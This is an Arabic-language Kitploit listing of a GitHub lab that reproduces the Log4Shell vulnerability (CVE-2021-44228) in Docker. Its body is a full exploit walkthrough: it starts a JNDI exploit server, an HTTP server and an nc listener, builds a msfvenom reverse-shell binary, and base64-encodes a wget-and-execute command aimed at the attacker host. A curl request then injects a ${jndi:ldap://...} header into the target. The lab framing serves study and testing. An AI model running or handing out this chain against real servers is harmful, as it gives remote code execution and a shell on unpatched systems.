Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker Env | Kitploit
أدوات/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker Env

عرض المستودع
4110منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيئة إعادة إنتاج Log4Shell

وصف المثال

عنوان IP للجهاز المستهدف: 47.47.47.47

عنوان IP لجهاز المهاجم: 48.48.48.48

تشغيل Docker للثغرة على الجهاز المستهدف

  • استخدم DockerFile لبناء صورة docker وتشغيلها:
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

تشغيل Docker الهجومي على جهاز المهاجم

  • استخدم DockerFile لبناء صورة docker وتشغيلها
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

تحضير بيئة جهاز المهاجم

نفّذ الأوامر في ثلاثة أصداف (shells) مختلفة، ويجب التأكد من بقاء الأصداف نشطة

  • تشغيل خادم JDNI على جهاز المهاجم
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • تشغيل خادم http على جهاز المهاجم
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • استماع على المنفذ باستخدام nc على جهاز المهاجم
docker exec -it attack /bin/bash
nc -lvvp 9000

تنفيذ الهجوم من جهاز المهاجم

نفّذ الأوامر في نفس الصدفة (shell)

docker exec -it attack /bin/bash
  • تجهيز ملف Reverse Shell على جهاز المهاجم
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • تجهيز الحمولة (payload) على جهاز المهاجم
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • إرسال الحمولة الهجومية (payload)
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

توليد الأوامر

python3 command_gen.py vuln_ip attack_ip

عرض الفيديو

الفيديو

المراجع

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
تنزيل الأداة